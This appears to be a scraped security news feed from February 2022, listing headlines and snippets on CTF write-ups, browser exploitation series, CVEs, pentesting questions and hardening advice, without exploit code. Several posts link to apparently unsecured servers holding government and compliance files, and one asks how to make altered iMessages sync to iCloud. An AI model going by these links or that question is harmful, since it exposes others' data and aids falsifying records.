    Back again with another Hacktoria geolocation walkthrough, this time on challenge 08. I must confess that took image took me a bit longer… Continue reading on Medium »  ( 7 min )
  • Open

    OSCP preparation - Buffer Overflow: VANILLA EIP OVERWRITE AND SEH
    submitted by /u/CyberMasterV [link] [comments]
    GUARDARA, a software quality assurance platform to identify bugs and zero-day vulnerabilities at scale, is now free for individual security researchers and non-commercial open-source projects.
    submitted by /u/JohnKeymanUK [link] [comments]  ( 1 min )
    Software Defined Radio, Part 6: Building a Cellphone IMSI Catcher (Stingray)
    submitted by /u/digicat [link] [comments]  ( 1 min )
    CVE-2022-24348 Argo CD Vulnerability and its impact on Kubernetes
    submitted by /u/rippatpop [link] [comments]  ( 1 min )
  • Open

    A Curious Glitch in XSS Sanitizing
    When looking for ways to bypass XSS sanitizing (sanitizing, not filtering), I’ve figured out something interesting but almost useless… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-02-06 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-06 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SysInternals — The Other Way Around
    We all have been sometime, someday in our professional life have used SysInternals Suite. I personally have used these utilities… Continue reading on Medium »  ( 2 min )
    Attack Simulation (Why it is Important!) Part 2 — Get one’s ducks in a row
    Now, following steps through part 1, we have lab setup and running. It is essential to understand how things are working in the background… Continue reading on Medium »  ( 4 min )
  • Open

    FreeBuf早报 | 美国起诉多个”诈骗“呼叫中心;一名美国黑客对朝鲜网络发动攻击
    因遭到勒索软件的攻击,位于荷兰阿姆斯特丹和鹿特丹、比利时安特卫普的几处港口的石油装卸和转运受阻。  ( 1 min )
  • Open

    Shuckworm Continues Cyber-Espionage Attacks Against Ukraine
    submitted by /u/dmchell [link] [comments]
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-38001(六)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 从0开始学 V8 漏洞利用之 CVE-2021-30632(五) CVE-2021-380...
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-38001(六)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 从0开始学 V8 漏洞利用之 CVE-2021-30632(五) CVE-2021-380...
  • Open

    [译] [论文] Raft 共识算法(及 etcd/raft 源码解析)(USENIX, 2014)
    译者序 本文翻译自 USENIX 2014 论文 In Search of an Understandable Consensus Algorithm (Extended Version) ,文中提出了如今已广泛使用的 Raft 共识算法。 在 Raft 之前,Paxos 几乎是共识算法的代名词,但它有两个严重缺点: 很难准确理解(即使对专业研究者和该领域的教授) 很难正确实现(复杂 + 某些理论描述比较模糊) 结果正如 Chubby(基于 Paxos 的 Google 分布式锁服务,是 Google 众多全球分布式系 统的基础)开发者所说:“Paxos 的算法描述和真实需求之间存在一个巨大鸿沟,...... 最终的系统其实将建立在一个没有经过证明的协议之上” [4]。 对于大学教授来说,还有一个更实际的困难:Paxos 复杂难懂,但除了它之外,又没有其他 适合教学的替代算法。 因此,从学术界和工业界两方面需求出发,斯坦福大学博士生 Diego Ongaro 及其导师 John Ousterhout 提出了 Raft 算法,它的最大设计目标就是可理解性, 这也是为什么这篇文章的标题是《寻找一种可理解的共识算法》。 与原文的可理解性目标类似,此译文也是出于更好地理解 Raft 算法这一目的。 因此,除了翻译时调整排版并加入若干小标题以方便网页阅读,本文还对照了 etcd/raft v0.4 的实现,这个版本已经实现了 Raft 协议的大部分功能,但还未做工程优化, 函数、变量等大体都能对应到论文中,对理解算法有很大帮助。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 摘要 1 引言 1.1 本文背景与目的 1.2 研究成果简介 1.3 本文组织结构 2 复制式状态机(replicated state machines) …

  • Open

    Is it possible to change the messages that are saved to iCloud
    Recently I’m dealing with a situation in which someone has edited the contents of a conversation in iMessages. I figured out how dates could be changed but now I want to know if it’s possible to make what’s saved to iCloud reflect what’s been created. submitted by /u/JasonTheTodd [link] [comments]  ( 1 min )
    How to proceed in the following hypothetical security breach scenario
    Hey, I was met with the following hypothetical scenario during school exam, to which my answer was insufficient. I'd love to hear your takes on it if you don't mind. "Bank's backup data were left unsecured on a public server. Propose a solution to protect data from being misused when this happens again." Thank you. submitted by /u/Ok-Cow-3198 [link] [comments]  ( 2 min )
    A webserver on my home computer
    I am trying to run a webserver on my computer that can be reached from the Internet. From what I understood, I would need to configure my router to allow the incoming http trafic to be forwarded to the webserver. However, for this to work, i would need to have a fixed public address, which is not the case for me.Is there a workaround to make this work without having to fix the IP on the ISP side? submitted by /u/spectnullbyte [link] [comments]  ( 3 min )
    "Technical skills" on a resume?
    I imagine I need something better than just listing the tools I can use. But then again I don't want something as generic as "DNS enumeration" or "Vulnerability Assessment". I've got decent work experience but I'm lacking trying to think of what I can put in the technical skills part that is useful but not bullshittery. submitted by /u/thehunter699 [link] [comments]  ( 1 min )
    Questions about Active Directory pentesting
    Hey everyone! I just started to look into AD stuff and I have a few questions. I hope this is the right subreddit for AD related questions. If not, please direct me to the appropriate one. Questions: If I use LLMNR or IPv6 DNS Poisoning and get the NTLM hash of a local admin, I can use that hash or the cracked password to access the machine he's an admin on. If I manage to fetch the hash of a domain admin, I can log into any machine on the domain including the domain controller. What can I do if I get hash of a lowly domain user? I cannot log into any machine. Can I still authenticate against the DC to get infos like users, policies, etc? Does it make a difference if I only have the hash or the cracked password? If we are only a regular domain user all we can do to escalate our privileges is kerberoasting, correct? Like, we can't do pass the hash / pass the password because we can't get any from a machine. And we can't do token impersonation because, again, we can't get onto any machine. I want to thank everyone in advance for answering any of these questions. Please correct me if I misunderstood anything. I'm really new to AD pentesting. submitted by /u/placeholderbagholder [link] [comments]  ( 3 min )
    When using Public WiFi.. is a VPN essential or should you just ensure you're using HTTPS?
    Hi all, Going travelling around the world and will likely rely on Public WiFi Hotspots. Do I definitely need a VPN or just ensure I'm connecting to sites with HTTPS? Whatabout if I use celluar instead..? Do I need a VPN then? Please let me know your thoughts. Burge x submitted by /u/MyNamesBurge [link] [comments]  ( 3 min )
  • Open

    Firefox JIT Use-After-Frees – Exploiting CVE-2020-26950
    Article URL: https://www.sentinelone.com/labs/firefox-jit-use-after-frees-exploiting-cve-2020-26950/ Comments URL: https://news.ycombinator.com/item?id=30225843 Points: 1 # Comments: 0  ( 23 min )
  • Open

    Shodan: Find Any Device Connected To The Internet
    IoT Devices Search Engine Continue reading on Medium »  ( 1 min )
    How to “build” an Information Security Industry at Home?
    Check out the following personal photos courtesy of Dancho Danchev which describe his experience in the information security industry. Continue reading on Medium »  ( 2 min )
    The UK “Freedom Convoy”
    I’ve been extremely tangentially following the Freedom Convoy activity as part of wider opposition-monitoring efforts, including… Continue reading on Medium »
    FIND THE CAMERA [KNIGHT-CTF]
    as it was mention needed to find the camera model number, exif this image but found nothing. again after reviewing the image get to know… Continue reading on Medium »  ( 1 min )
  • Open

    Resolviendo Daily Bugle de TryHackMe Pt1
    Muy buenos días, tarde o noches estimados lectores, el día de hoy les traigo mi primer publicación en Medium, la resolución del room de… Continue reading on Medium »  ( 2 min )
    [RedDev Series #4] Experimenting SysWhisper2 with LLVM Obfuscator
    Some notes on setting up both LLVM obfuscator and SysWhisper2 in Visual Studio 2019. Continue reading on Medium »  ( 2 min )
  • Open

    Dancho Danchev's Second Edition of "Cybercrime Forum Data Set for 2022" Available - 113GB Direct Torrent Download Available! Grab a Free Copy Today!
    Here we go. https://academictorrents.com/details/131080b57d568ca3d05794cde5a3d7774f890373 - Dancho Danchev's Research Compilation 2005-2022 - Direct Torrent Download Available! https://academictorrents.com/details/e1b755efb9cb7ec5d5bcea4e60911e2a70a86201 - Dancho Danchev's Cybercrime Forum Data Set for 2022 - Second Edition - Direct Torrent Download Available! https://academictorrents.com/download/131080b57d568ca3d05794cde5a3d7774f890373.torrent - Dancho Danchev's Research Compilation 2005-2022 - Direct Torrent Download Available! https://academictorrents.com/download/e1b755efb9cb7ec5d5bcea4e60911e2a70a86201.torrent - Dancho Danchev's Cybercrime Forum Data Set for 2022 - Second Edition - Direct Torrent Download Available! The compilation is also available here: https://www.kaggle.com/danchodanchev/dancho-danchevs-cybercrime-forum-data-set-torrent Stay tuned!
    Who is Dancho Danchev?
    Folks, Do you remember who I am? Do you need to do a historical check on the security industry including me as an individual including my personal blog and all the socially-oriented work and contributors that I've made to the industry during the past ten years? If an image is worth a thousand words consider going through these images which I just found and took photos of and guess what - brace yourselves for the ultimate reality where I've officially spend over two decades actively working and researching the security industry. What's my idea to publish these images? My personal goal and motivation is to make it clear and to ensure that my readers truly know what I've been up to in terms of challenges and all the hard work that I've done and achieved over the past twenty years in the secur…
  • Open

    Domain Persistence: Computer Accounts
    Introduction Often while configuring Active Directories, system admins don’t recognize the harm that comes with allowing a local administrator account on a system assigned to The post Domain Persistence: Computer Accounts appeared first on Hacking Articles.  ( 7 min )
  • Open

    Domain Persistence: Computer Accounts
    Introduction Often while configuring Active Directories, system admins don’t recognize the harm that comes with allowing a local administrator account on a system assigned to The post Domain Persistence: Computer Accounts appeared first on Hacking Articles.  ( 7 min )
  • Open

    Does a master’s in cybersecurity and digital forensics require an engineering maths background or is Bachelors in IT with topics like Basic maths, discrete structure and Numerical methods enough?
    what i know from my research is that different universities have different criteria like Calculus I and II but a basic undergrad IT course may not contain multiple maths topic like Computer science or engineering course does. So will bachelors in Information technology be enough to later apply as international student in different countries for Msc cyber forensics submitted by /u/axyut [link] [comments]  ( 2 min )
  • Open

    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)… Continue reading on InfoSec Write-ups »  ( 2 min )
    Server-Side Request Forgery to Internal SMTP Access — Indonesia
    Untuk mengetahui basic dari SSRF bisa membaca Beginner Guide To Exploit Server Side Request Forgery (SSRF) Vulnerability — Indonesia Continue reading on Medium »  ( 2 min )
    All About the CSRF vulnerability
    This Blog is all about the CSRF Vulnerabilities and Lot more BOOM !!!!!!!!!! Continue reading on Medium »  ( 4 min )
    What I’ve learned from hunting bugs for 2 months?
    Bug bounty hunting, a glamourous life of 100k bounties followed by Lamborghini pics on social media. If you are alive and in the part of… Continue reading on Medium »  ( 3 min )
    IDOR with Autorize!
    Here is my write-up, I’m gonna tell you about my recent finding and my first IDOR(Insecure direct object references). Continue reading on Medium »  ( 2 min )
    Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace
    Hello All Continue reading on Medium »  ( 1 min )
  • Open

    oniongrok: Onion addresses for anything.
    submitted by /u/oniongrok [link] [comments]  ( 1 min )
    Testing Infrastructure-as-Code Using Dynamic Tooling
    submitted by /u/digicat [link] [comments]  ( 1 min )
    CISSP Domain 1 - Episode 4 - Business Case, Types of Project Plans, Organizational Process, Change Management and Data Classification by Get Set CISSP
    submitted by /u/Tradition_Wonderful [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-05 Review
    对Java反序列化数据绕WAF新姿势的补充 by ourren 连载:演化的高级威胁治理(五) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-05 Review
    对Java反序列化数据绕WAF新姿势的补充 by ourren 连载:演化的高级威胁治理(五) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Vulnerability Disclosure Programs Done the Right Way
    Article URL: https://www.lutasecurity.com/post/vulnerability-disclosure-programs-done-the-right-way Comments URL: https://news.ycombinator.com/item?id=30221511 Points: 2 # Comments: 0  ( 3 min )
  • Open

    Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace
    Hello All Continue reading on Medium »  ( 1 min )
  • Open

    beer labels, sorted by country.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    interior design/architecture photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    O_D Movies/
    https://203.51.37.9:9802/Movies/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-30632(五)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 复现CVE-2021-30632 第三个研究的是CVE-2021-30632,其chrom...
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-30632(五)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 复现CVE-2021-30632 第三个研究的是CVE-2021-30632,其chrom...

  • Open

    Philippine Department of the Interior -=-=[ O_D ]=-=-
    http://www.downloads.region10.dilg.gov.ph/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
    Hazardous material compliance reports
    http://13.113.60.173:81/output/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
    Jackpot
    http://dhakaftp.com/Data/ Lots of movies. Really good Download speeds. look for "English movies" or "Hollywood" in folders for movies in English. Try to take it easy as to not overwhelm the site. submitted by /u/soulkrypto [link] [comments]
    Nobel OD server in Romania
    submitted by /u/stereoroid [link] [comments]  ( 1 min )
  • Open

    DD-WRT Post Attack Forensics
    Hello all, I recently discovered my router running DD-WRT has been hacked. What I mean by that is, I got an email from ISP about abuse which indicated my IP has been brute forcing ssh. I went to investigate and noticed my DD-WRT WebGUI is disabled and that my ESXI lab (which had default creds since it was a small lab and not exposed to internet) had been tampered with. I have removed power from the infected router and gotten back online with a cheap walmart backup, but I want to investigate this and get my infected router back online safely without losing evidence. Any DD-WRT advice would be appreciated as to how I should start my analysis. Thanks submitted by /u/the_grey_philosopher [link] [comments]  ( 2 min )
  • Open

    Why are so many ports open on Xiaomi router?
    https://imgur.com/a/zSorMtG submitted by /u/Tqis [link] [comments]  ( 1 min )
    Port Ranges Set to DENY in UFW (Firewall) are Still Allowing Traffic on Those Ports
    Hey all, Here is a screen grab of ‘grep “Failed password” /var/log/auth.log’ for reference: https://imgur.com/a/G2bwrZO I have the port range 30999:59999 set to DENY IN from ANYWHERE for udp and tcp traffic, yet I’m still receiving login attempts within the ranges of blocked ports. Can anybody spot a misconfiguration, or perhaps explain what I’m missing with UFW? submitted by /u/OffishalFish [link] [comments]  ( 1 min )
    Hardening guides primarily for Microsoft products
    Hi everyone, I remember that the NSA used to make the de facto hardening guide for Windows/AD environments. However, I can only find one relating to Windows Server 2000. Are there any modern versions of that relating to the Microsoft/Azure/AD environments from another trusted instance, not some company trying to sell a product? Thank you for all your support. submitted by /u/Adrixan [link] [comments]  ( 1 min )
    Need help understanding XXE Injection
    So, I was practicing XXE labs on portswigger web sec academy and I came across a DTD payload with the characters "%" in the nested entities. I tried to find if there is a syntax specification for this in xml but found nothing regarding it, all I found by googling this are just some more xml payloads. So, anybody have any idea what these characters exactly are and what they do? I am thinking like these are only used in nested entity definitions, is that correct? I am totally confused. Any help would be greatly appreciated. ​ PS: I am a complete newbie. So, if this is a stupid question forgive me! submitted by /u/DeadTree_22 [link] [comments]  ( 1 min )
    Fml it’s pronounced demon!
    I did not know that daemon is pronounced demon. Maybe someone else will see this and learn too. submitted by /u/lowkiwatchingyou [link] [comments]  ( 2 min )
    Do I need to be good at programming (C to be more specific) in order to get ahead in my CyberSecurity field?
    The moment I opt in my college first year (1st sem), The college gave us the syllabus of C, I'm pretty bad at it cuz C isn't something that I had dealt firsthand in the last year and tbh I'm a python kinda guy I only worked with python so C isn't a area of my interest. So my question is that Do I need to be too good at C is it gonna be relevant somehow later in hacking field? submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    Edge Filelinks
    In newer versions of edge filelinks (e.g. to a unc path) are blocked by default. Are there any security issues allowing filelinks for secure intranet zones? It can be activated via policy https://docs.microsoft.com/en-us/deployedge/microsoft-edge-policies Thanks! submitted by /u/montyspinneratz [link] [comments]
    Best WiFi card for penetration testing, passive mode, injection?
    I understand that my terminology might be a bit out of date. It's been a while, I know to research on my own. I want to know, though, what the best advice on here is for cracking 802.11 networks, and such things., Last i checked it was the ALFA AWUS 036 N card, I have one, and then they released the 802.11n version. What is the gold standard these days? The best I can tell, is actually nothing - with a strong password, WPA-2, modern encryption... What are we dealing with these days? I still have my ALFA card and several other 802.11n card that can inject packets. Just feel like there has been a lot of fragmentation over the last decade and really, any opinions on whether or not the whole "WiFi hacking" gig is dead, well, I want your thoughts. submitted by /u/ValerieVexen [link] [comments]  ( 1 min )
  • Open

    Apiiro team uncovers 0-day vulnerability in Argo CD
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30212283 Points: 1 # Comments: 0  ( 6 min )
    CVE-2022-24348: vulnerability in Argo CD can be used to steal sensitive info
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30204744 Points: 3 # Comments: 0  ( 6 min )
  • Open

    Linux | Madaidan's Insecurities
    submitted by /u/Nhamatanda [link] [comments]
    Rooting Gryphon Routers via Shared VPN : 🎵 This LAN is your LAN, this LAN is my LAN 🎵
    submitted by /u/stargravy [link] [comments]  ( 1 min )
    Multiple vulnerabilities in Nooie baby monitor
    submitted by /u/jaymzu [link] [comments]
    Silly proof of concept: Anti-phishing using perceptual hashing algorithms
    submitted by /u/anvilventures [link] [comments]  ( 2 min )
    Compromising out-of-bound secrets on Argo CD platform utilizing a malicious Kubernetes Helm Chart (CVE-2022-24348)
    submitted by /u/dalmoz [link] [comments]
  • Open

    Anubis HackTheBox Walkthrough
    Introduction Anubis is an “insane” level CTF box available on the HackTheBox platform designed by 4ndr34z. The box covers a real-life scenario of initial exploitation The post Anubis HackTheBox Walkthrough appeared first on Hacking Articles.  ( 12 min )
  • Open

    Anubis HackTheBox Walkthrough
    Introduction Anubis is an “insane” level CTF box available on the HackTheBox platform designed by 4ndr34z. The box covers a real-life scenario of initial exploitation The post Anubis HackTheBox Walkthrough appeared first on Hacking Articles.  ( 12 min )
  • Open

    Reflected XSS and Blind out of band command injection at subdomain dstuid-ww.dst.ibm.com
    IBM disclosed a bug submitted by smokin-ac3z: https://hackerone.com/reports/410334
    'net/http': HTTP Header Injection in the set_content_type method
    Ruby disclosed a bug submitted by chinarulezzz: https://hackerone.com/reports/1168205
  • Open

    100 Days of Hacking — DAY 1
    Let’s see how it goes Continue reading on Medium »  ( 2 min )
    Threat Modelling
    Few words on Threat Modelling. Continue reading on Medium »
    Easy Understanding of Owasp Top 10-2021
    What is owasp ? Continue reading on Medium »  ( 3 min )
    PORTSWIGGER WEB SECURITY - BUSINESS LOGIC VULNERABILITIES LAB ÇÖZÜMLERİ
    Business Logic (İş Mantığı) zafiyeti, bir web uygulamasının tasarımında ve uygulamasında, saldırganın istenmeyen davranışlar sergilemesine… Continue reading on Medium »  ( 15 min )
  • Open

    Are all Websites Hackable? Why (not)?
    Frankly, no security is 100% secure. As infections continue to surge across the web, and attackers think of more innovative ways to remain undetected, many site owners wonder if they’ll be the next victim. In this article we’ll discuss what to look out for and consider when managing a website, why these hacks may occur, and how to lock down vulnerabilities. What kind of sites are the most vulnerable? No site is 100% fully secure because sites are managed by people, and people are fallible. Continue reading Are all Websites Hackable? Why (not)? at Sucuri Blog.
  • Open

    SecWiki News 2022-02-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    How to avoid API blind spots in web application security testing
    APIs are a crucial part of modern web application development and make up a large chunk of your total web attack surface. Learn how Invicti helps organizations make API vulnerability testing an integral part of their secure SDLC. READ MORE  ( 4 min )
  • Open

    Quiztime — Random OSINT Challenge 11
    On Jan 23, 2022, Quiztime (contributor @SEINT_pl) shared a new OSINT quiz with us. Continue reading on Medium »  ( 2 min )
    How to Track Down Cyber Threat Actors and FBI’s Most Wanted Cybercriminals Using OSINT and Maltego?
    Do you want to become famous? Did you know that an OSINT conducted today is a tax payer’s buck saved somewhere? Keep reading. Continue reading on Medium »  ( 8 min )
  • Open

    A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT Analysis
    An image is worth a thousand words. Say no words! Related posts: An Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law Enforcement Officers from the City of Troyan Bulgaria Circa 2010 - An Analysis What You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself To the Almighty Savior! - An Analysis Dancho Danchev's Disappearance - An Elaboration - Part Two Dancho Danchev's Disappearance 2010 - Official Complaint Against Republic of Bulgaria Dancho Danchev's Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - Part Three Dancho Danchev's Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - Part Two Deep from the Trenches in Bulgaria - Part Three Deep from the Trenches in Bulgaria - Part Two How I Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria A Profile of a Bulgarian Kidnapper – Pavlin Georgiev (Павлин Георгиев/Васил Моев Гачевски/Явор Колев) – An Elaboration on Dancho Danchev’s Disappearance circa 2010 – An Analysis
  • Open

    冬训营丨高级威胁活动中C2的多样风格
    C2作为名词来讲,是指APT组织掌握的基础设施,也就是IP、域名、URL。  ( 1 min )
  • Open

    CVE-2022-24348: vulnerability in Argo CD can be used to steal sensitive info
    Article URL: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Comments URL: https://news.ycombinator.com/item?id=30204744 Points: 3 # Comments: 0  ( 6 min )
    Hostapd/wpa_supplicant: new release v2.10 (with CVE fixes)
    Article URL: https://lists.infradead.org/pipermail/hostap/2022-January/040148.html Comments URL: https://news.ycombinator.com/item?id=30200900 Points: 1 # Comments: 0  ( 3 min )
  • Open

    Lumberjack Turtle — Writeup
    Difficulty: Medium Room  Description: No logs, no crime… so says the lumberjack.  ( 3 min )
    What is Social Engineering
    Art of Psychological manipulation  ( 2 min )
    Content Discovery TryHackme
    Hi, amazing fellow hackers, I produced an interesting topic web content discovery. It is useful in bug bounty and the most important thing…  ( 3 min )
    Day 21, Web Reconnaissance Or Information Gathering — Part 6#100DaysofHacking
    Get all the writeups from Day 1 to 20, Click Here Or Click Here.  ( 3 min )
  • Open

    Lumberjack Turtle — Writeup
    Difficulty: Medium Room  Description: No logs, no crime… so says the lumberjack.  ( 3 min )
    What is Social Engineering
    Art of Psychological manipulation  ( 2 min )
    Content Discovery TryHackme
    Hi, amazing fellow hackers, I produced an interesting topic web content discovery. It is useful in bug bounty and the most important thing…  ( 3 min )
    Day 21, Web Reconnaissance Or Information Gathering — Part 6#100DaysofHacking
    Get all the writeups from Day 1 to 20, Click Here Or Click Here.  ( 3 min )
  • Open

    Lumberjack Turtle — Writeup
    Difficulty: Medium Room  Description: No logs, no crime… so says the lumberjack.  ( 3 min )
    What is Social Engineering
    Art of Psychological manipulation  ( 2 min )
    Content Discovery TryHackme
    Hi, amazing fellow hackers, I produced an interesting topic web content discovery. It is useful in bug bounty and the most important thing…  ( 3 min )
    Day 21, Web Reconnaissance Or Information Gathering — Part 6#100DaysofHacking
    Get all the writeups from Day 1 to 20, Click Here Or Click Here.  ( 3 min )
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 复现CVE-2020-6507 信息收集 在复习漏洞前,我们首先需要有一个信息收集的阶段: 可以从Chrome的官方更新公告得知某个版本的Chrome存在哪...
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四)
    作者:Hcamael@知道创宇404实验室 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 复现CVE-2020-6507 信息收集 在复习漏洞前,我们首先需要有一个信息收集的阶段: 可以从Chrome的官方更新公告得知某个版本的Chrome存在哪...

  • Open

    Reload4j 1.2.18.5: A drop-in replacement for Log4j 1.2.17 and CVE fixes
    Article URL: https://reload4j.qos.ch/news.html Comments URL: https://news.ycombinator.com/item?id=30200504 Points: 2 # Comments: 0  ( 1 min )
    Fuzzing Java to Find Log4j Vulnerability – CVE-2021-45046
    Article URL: https://www.youtube.com/watch?v=kvREvOvSWt4 Comments URL: https://news.ycombinator.com/item?id=30190779 Points: 1 # Comments: 0
  • Open

    What is considered more secure VPN client software on IoT device or IoT device behind VPN?
    submitted by /u/baghdadcafe [link] [comments]  ( 1 min )
    Passive log analysis software
    Hello, I am interested if there is tool/software that will help me analyze logs from web server, ssh and Mysql for intrusion, but on another PC. So I basically want to pull logs from many servers and run them trough some software that can detect possible SQLi or path traversal attempts, something like that. I know there is Snort and SIEMs but is there any software that will use for example Snorts engine and rules to do this analysis offline ? Or can I run snort on some log file from other server? P.S. possibly open source. Thanks. submitted by /u/P-e-t-a-r [link] [comments]  ( 5 min )
    OneNote Visibility
    Hi Guys. I like OneNote, and my org blocks anything else, I use it at work and at home. Three questions: If I login to my work OneNote account, on my personal Mac/Win/Linux computers, can my work track my computers at all, or see it's MAC address or name? If I login to my personal OneNote account on my work computer, can they read my OneNotes? Do the answers to the above two questions apply for all of OneDrive too? Appreciate any responses as I've been told that it's all pretty private so I should be good to go with either. submitted by /u/bloqs [link] [comments]  ( 3 min )
  • Open

    Chrome 99: CSS Cascade Layers, a New Picker for Input Elements, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 99 is beta as of February 3, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Preparing for Chrome 100 This year, Chrome will release version 100, adding a digit to the version number reported in Chrome's user agent string. To help site owners test for the new string, Chrome 96 introduced a runtime flag that causes Chrome to return '100' in its user agent string. This new flag called chrome://flags/#force-major-version-to-100 has been available since Chrome 96. For more information, se…
  • Open

    Index of NASA's Land Processes Distributed Active Archive Center
    https://e4ftl01.cr.usgs.gov/ASTT/ ​ Some sort of unsecured government website. submitted by /u/Main_Force_Patrol [link] [comments]
    Indexes from Bronless.Grotto.Faith
    https://bornless.grotto.faith/pages/ https://bornless.grotto.faith/images/ submitted by /u/EmuAnon34 [link] [comments]
    Mozart Opera Omnia in FLAC format (200 CDs)
    http://rmeyer.comelitdns.com/Music/MOZART%20225/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
    Doom 2 WADS
    submitted by /u/millhouse187 [link] [comments]  ( 1 min )
    Lots of movies and TV. Slow connection.
    submitted by /u/josephalbright1 [link] [comments]
    I need a search engine for stat.ameba.jp
    Several blogs from some J-Pop groups were deleted but the photos remain on ameba's servers. I have found a few (https://stat.ameba.jp/user_images/82/56/10138975701.jpg) but would like to search images I have in low quality on this site. submitted by /u/Alarod [link] [comments]
  • Open

    Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (Updated Feb. 16)
    We continue to monitor Gamaredon. We mapped three large clusters of their infrastructure, identified potential malware testing activity and more. The post Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (Updated Feb. 16) appeared first on Unit42.
  • Open

    Beethoven X Joins Balancer Labs’ Bug Bounty Program
    In April 2021, Balancer Labs decided to go big in pursuit of uncovering vulnerabilities in their V2 Vault architecture with the launch of… Continue reading on Balancer Protocol »  ( 2 min )
    [Bugbounty]SSRF — IFRAME INJECTION E XSS REFLECTED
    Hoje vou falar um pouco de uma falha que me levou a dois relatórios infelizmente ambos foram duplicados porém ficou de experiência e… Continue reading on Medium »  ( 2 min )
    Subdomain Takeover Bugs — When They’re Applicable And When They’re Not
    At Immunefi, we receive a large number of reports from whitehats regarding subdomain takeovers. But we have a policy of always marking… Continue reading on Immunefi »  ( 3 min )
    UnderRated Tool For Pass-The-Hash[Evil-WinRM]
    First Of all I’ll Describe What is Pass-The-Hash Attack Continue reading on Medium »  ( 1 min )
  • Open

    A detailed analysis of Lazarus malware disguised as Notepad++ Shell Extension
    submitted by /u/CyberMasterV [link] [comments]
    NTLM Relaying - A comprehensive guide
    submitted by /u/jeanc0re [link] [comments]  ( 1 min )
    [CVE-2022-23602] Don't trust comments
    submitted by /u/crower [link] [comments]  ( 1 min )
    History of REvil: detailed report on the rise and fall of a Russian crime gang.
    submitted by /u/Jazzlike-Resource500 [link] [comments]
  • Open

    Interview questions for entry level incident response positions?
    i have an interview coming up soon. What sort of technical questions /scenario questions should I be expecting? Thx submitted by /u/tfulab23 [link] [comments]  ( 2 min )
    Photorec Issues
